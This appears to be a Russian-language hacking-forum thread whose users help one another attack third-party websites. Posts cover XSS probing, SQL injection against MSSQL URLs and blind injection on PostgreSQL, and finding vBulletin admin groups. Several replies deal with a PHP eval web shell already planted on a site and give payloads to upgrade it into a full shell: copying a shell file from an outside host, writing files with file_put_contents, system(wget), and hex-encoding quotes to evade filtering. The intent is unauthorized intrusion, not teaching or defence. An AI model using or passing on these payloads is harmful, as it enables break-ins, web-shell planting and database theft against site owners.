поиск - классная штука. Code: http://www.google.ru/search?client=opera&rls=en&q=site:forum.antichat.ru+%D1%80%D0%B0%D1%81%D0%BA%D1%80%D1%8B%D1%82%D0%B8%D0%B5+%D0%BF%D1%83%D1%82%D0%B5%D0%B9&sourceid=opera&ie=utf-8&oe=utf-8&channel=suggest первая ссылка Code: http://forum.antichat.ru/threadnav30632.html и ещё куча тем и тому подобного.
Зашел на один портал, решил проверить логин на xss, при вставке <script>alert('12');</script> в любое поле(пароль;логин) ифрейм(вводятся данные в ифрейме) выдает - Server Error in '/' Application. Code: <b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine. <br><br> <b>Details:</b> To enable the details of this specific error message to be viewable on remote machines, please create a <customErrors> tag within a "web.config" configuration file located in the root directory of the current web application. This <customErrors> tag should then have its "mode" attribute set to "Off".<br><br> можно как-то использовать в своих целях?
Здравствуйте. Помигите пожалуйста. Допустим сайт вида http://sait.com/tut-tekst/i-tut.html возможно ли проверсти SQL иьекцию при таком виде ссылки если да то как. Какие еще можно провести атаки при таком виде ссылки чтобы получить доступ к базе данных
Такая проблема: залил файл с таким содержанием <?php @eval($_GET[cmd]); ?>. phpinfo вывелось без проблем, но когда делаю так eval(file_put_contents('site.ru/sh.txt')); , то ничего не происходит. Каким образом можно получить полноценный шелл?
во-первых, http://php.net/manual/ru/function.file-put-contents.php во-вторых, magic quotes учитывай а шелл так льется, например: 1=http://pentagon.gov/images/shell.txt&2=1.php&cmd=copy($_GET[1],$_GET[2]);
ну мог бы по аналогии fileputcontens заюзать 1=<?php shell>&2=shell.php&cmd=file_put_contents($_GET[1],$_GET[2]); также можно вариации с методом POST использовать, чтоб в логах не следить, да и изначально писать не просто eval($_GET[CMD]), а что-нибудь поудобнее, например аплоадер файлов.
file_put_contents - пробовал, безрезультатно. Так я лью через скулю, файл с таким кодом я хотел залить <?php if (isset($_REQUEST['e'])) eval(stripslashes($_REQUEST['e'])); ?> Но увы )); почему-то не приняло. Может в бейс закодить?
Слабо знаком с SQL-иньекциями в MSSQL. http://www.site.com/internal.asp?ProdID=124335' http://www.site.com/internal.asp?ProdID=124335-- Все в порядке, т.е. никаких кавычек и скобок закрывать не нужно, верно? http://www.site.com/internal.asp?ProdID=124335+AND+1=1-- http://www.site.com/internal.asp?ProdID=124335+OR+1=@@version-- Что я делаю не так?
Читал, и не только там. В общем, даже не важно, MSSQL или MySQL. Такая банальная вещь, как id=123+AND+1=1-- (или подобная) должна была сработать, но не вышло. Поэтому и спрашиваю, может нюанс какой-то не улавливаю?
все нюансы можно понять только увидев линк, т.к. каждый пример индивидуален и не имеет шаблонных решений (в большинстве своём)
проверь версию php - file_put_contents толькой с пятой. Если действительно чеетвертая, то вариантов все равно масса - код аплоадера сунь, или через fwrite(fopen) или system(wget), или еще что-нибудь придумай. Кавычки убери или закодь, но не в бейс, а в хекс.
есть форум на vbulletin, можно ли какнибудь посмотреть(до расшифровки хешей), какие группы могут входить в админ панель?Точнее так, в какой таблице хранятся группы которые могут входить в админку
PostgreSQL 9.0.3 on i386-portbld-freebsd8.2, compiled by GCC cc (GCC) 4.2.1 20070719 [FreeBSD], 32-bit Близорукая инъекция. Если через нее подбирать ascii к версии, пользователю или имени БД то все норм выводится. Когда же начинаю вычислять имена таблиц, то они мягко говоря странные и для вариантов через INFORMATION_SCHEMA и PG_TABLES они разные: INFORMATION_SCHEMA: Code: uuywywwuwuwwuwuywwuuu h u hyuuuuu uyuy uy u _hh_hhy_ yu_ h__ ___ssesosngio jc_j_ hx__ x_ vx_xxceetrinaam csccc_ ccc__cc_scxccstnrogz kesvkc_kvvjcvvcescssefroi vnessscssscvssvneveenool stneeekeeevseestnsnntip eqtnnnvnnnsennerterrpma trqtttstttenttnbqnoogp rorrrrerrrntrrtortllag flffffnzbftrbfrlbqii bibbbbtbobrbobfiorad idlooorolobolobdlb p dpilllzlilllilomio a pgdiiioidiiidilpdl aapdddldmpddpmigmd mpppippmppggdapm gmmmdmggmgaam gp agggpgaaga p aaama ASCII идентичные UTF-8 коды для вышеуказанных имен таблиц: Code: 117 117 121 119 121 119 119 117 119 117 119 119 117 119 117 121 119 119 117 117 117 104 117 104 121 117 117 117 117 117 117 121 117 121 117 121 117 95 104 104 95 104 104 121 95 121 117 95 104 95 95 95 95 95 115 115 101 115 111 115 110 103 105 111 106 99 95 106 95 104 120 95 95 120 95 118 120 95 120 120 99 101 101 116 114 105 110 97 97 109 99 115 99 99 99 95 99 99 99 95 95 99 99 95 115 99 120 99 99 115 116 110 114 111 103 122 107 101 115 118 107 99 95 107 118 118 106 99 118 118 99 101 115 99 115 115 101 102 114 111 105 118 110 101 115 115 115 99 115 115 115 99 118 115 115 118 110 101 118 101 101 110 111 111 108 115 116 110 101 101 101 107 101 101 101 118 115 101 101 115 116 110 115 110 110 116 105 112 101 113 116 110 110 110 118 110 110 110 115 101 110 110 101 114 116 101 114 114 112 109 97 116 114 113 116 116 116 115 116 116 116 101 110 116 116 110 98 113 110 111 111 103 112 114 111 114 114 114 114 101 114 114 114 110 116 114 114 116 111 114 116 108 108 97 103 102 108 102 102 102 102 110 122 98 102 116 114 98 102 114 108 98 113 105 105 98 105 98 98 98 98 116 98 111 98 114 98 111 98 102 105 111 114 97 100 105 100 108 111 111 111 114 111 108 111 98 111 108 111 98 100 108 98 112 100 112 105 108 108 108 122 108 105 108 108 108 105 108 111 109 105 111 97 112 103 100 105 105 105 111 105 100 105 105 105 100 105 108 112 100 108 97 97 112 100 100 100 108 100 109 112 100 100 112 109 105 103 109 100 109 112 112 112 105 112 112 109 112 112 103 103 100 97 112 109 103 109 109 109 100 109 103 103 109 103 97 97 109 103 112 97 103 103 103 112 103 97 97 103 97 112 97 97 97 109 97 PG_TABLES: Code: huuuywhuuuyw yyw jy__uu y cecjhhc_c _cxe___ecineo sqscs vxv_jscnveensdpta trnse_scsscestsnntapaf borencekeesnertirr dgbntsnsnnetnormoo paltretetttrtlfplg a drfnrnrrrbrio d mfbtztbfloomg poorlrobiiiaa gllfibloddg iibdoilppa ddomldimg ppipimpga gmdgdpma agpamgg am Code: 104 117 117 117 121 119 104 117 117 117 121 119 121 121 119 106 121 95 95 117 117 121 99 101 99 106 104 104 99 95 99 95 99 120 101 95 95 95 101 99 105 110 101 111 115 113 115 99 115 118 120 118 95 106 115 99 110 118 101 101 110 115 100 112 116 97 116 114 110 115 101 95 115 99 115 115 99 101 115 116 115 110 110 116 97 112 97 102 98 111 114 101 110 99 101 107 101 101 115 110 101 114 116 105 114 114 100 103 98 110 116 115 110 115 110 110 101 116 110 111 114 109 111 111 112 97 108 116 114 101 116 101 116 116 116 114 116 108 102 112 108 103 97 100 114 102 110 114 110 114 114 114 98 114 105 111 100 109 102 98 116 122 116 98 102 108 111 111 109 103 112 111 111 114 108 114 111 98 105 105 105 97 97 103 108 108 102 105 98 108 111 100 100 103 105 105 98 100 111 105 108 112 112 97 100 100 111 109 108 100 105 109 103 112 112 105 112 105 109 112 103 97 103 109 100 103 100 112 109 97 97 103 112 97 109 103 103 97 109 Пробывал делать to_ascii(TABLE_NAME), но в таком случае: Code: pg_query(): Query failed: ERROR: encoding conversion from UTF8 to ASCII not supported
